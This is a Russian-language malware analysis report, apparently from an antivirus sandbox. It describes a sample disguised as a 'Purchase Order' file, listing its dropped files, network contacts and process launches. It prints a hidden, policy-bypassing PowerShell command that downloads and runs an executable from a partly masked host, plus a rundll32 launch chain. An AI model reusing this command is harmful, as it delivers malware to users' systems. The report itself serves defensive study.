Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://ma###msrl.com/frs8umnq9myy5ap.exe как %appdata%\purchase order
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\abdtfhghgdghghœ.sct
- %APPDATA%\purchase order
Сетевая активность
Подключается к
- 'ma###msrl.com':80
UDP
- DNS ASK ma###msrl.com
Другое
Ищет следующие окна
- ClassName: 'AdobeAcrobat' WindowName: ''
- ClassName: 'NDDEAgnt' WindowName: 'NetDDE Agent'
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://ma###msrl.com/frS8UmNq9MyY5Ap.exe','%APPDATA%\Purchase Order');Start-P...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\shell32.dll,OpenAs_RunDLL %APPDATA%\Purchase Order
- '%ProgramFiles(x86)%\adobe\acrobat reader dc\reader\acrord32.exe' "%APPDATA%\Purchase Order"
